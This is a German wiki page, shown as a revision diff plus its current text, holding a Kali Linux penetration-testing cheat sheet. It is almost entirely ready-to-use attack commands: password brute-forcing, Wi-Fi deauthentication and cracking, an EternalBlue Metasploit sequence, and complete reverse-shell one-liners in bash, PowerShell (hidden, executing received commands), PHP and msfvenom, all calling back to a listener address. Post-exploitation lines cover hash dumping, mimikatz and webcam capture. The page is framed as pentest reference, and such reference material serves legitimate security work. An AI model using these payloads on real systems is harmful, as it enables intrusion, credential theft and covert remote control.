Kali Cheat Sheet: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
(Die Seite wurde neu angelegt: „= Kali Linux Cheat Sheet (Penetration Testing) = == Information Gathering == * nmap -sS -A target.com * whois target.com * theharvester -d target.com -b all *…“)
 
 
Zeile 47: Zeile 47:
 
* python3 exploit.py
 
* python3 exploit.py
 
* search type:exploit platform:windows
 
* search type:exploit platform:windows
 +
  
 
== System Access & Reverse Shells ==
 
== System Access & Reverse Shells ==
 
* nc -lvnp 4444
 
* nc -lvnp 4444
* bash -i >& /dev/tcp/attacker_ip/4444 0>&1
+
* bash -i >& /dev/tcp/10.0.10.101/4444 0>&1
* powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attacker_ip',4444);"
+
* powershell -nop -w hidden -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.10.101',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data = (New-Object Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
 
* socat TCP4-LISTEN:4444,fork EXEC:/bin/bash
 
* socat TCP4-LISTEN:4444,fork EXEC:/bin/bash
* php -r '$sock=fsockopen("attacker_ip",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
+
* php -r '$sock=fsockopen("10.0.10.101",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
* msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f exe > shell.exe
+
* msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.10.101 LPORT=4444 -f exe > shell.exe
  
 
== Post-Exploitation ==
 
== Post-Exploitation ==

Aktuelle Version vom 18. Januar 2026, 14:39 Uhr

Kali Linux Cheat Sheet (Penetration Testing)

Information Gathering

Password Attacks

  • hydra -l admin -P rockyou.txt target.com http-get
  • john --wordlist=rockyou.txt hash.txt
  • hashcat -m 0 hash.txt rockyou.txt
  • cewl http://target.com -w wordlist.txt
  • crunch 6 10 abcdef1234
  • medusa -h
  • patator ssh_login host=IP user=FILE0 password=FILE1 0=user.txt 1=pass.txt

Wireless Attacks

  • airmon-ng start wlan0
  • airodump-ng wlan0mon
  • aireplay-ng --deauth 10 -a BSSID wlan0mon
  • aircrack-ng -w wordlist.txt capture.cap
  • wash -i wlan0mon
  • reaver -i wlan0mon -b BSSID -vv
  • wifite

Vulnerability Scanning

Exploitation

  • msfconsole
  • use exploit/windows/smb/ms17_010_eternalblue
  • set RHOST target_ip
  • set PAYLOAD windows/meterpreter/reverse_tcp
  • run
  • python3 exploit.py
  • search type:exploit platform:windows


System Access & Reverse Shells

  • nc -lvnp 4444
  • bash -i >& /dev/tcp/10.0.10.101/4444 0>&1
  • powershell -nop -w hidden -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.10.101',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data = (New-Object Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
  • socat TCP4-LISTEN:4444,fork EXEC:/bin/bash
  • php -r '$sock=fsockopen("10.0.10.101",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.10.101 LPORT=4444 -f exe > shell.exe

Post-Exploitation

  • meterpreter > getuid
  • meterpreter > hashdump
  • mimikatz
  • netstat -ano
  • wmic useraccount list brief
  • meterpreter > screenshot
  • meterpreter > webcam_snap
  • ps
Abgerufen von „http://wiki.ixheim.de/index.php?title=Kali_Cheat_Sheet&oldid=66266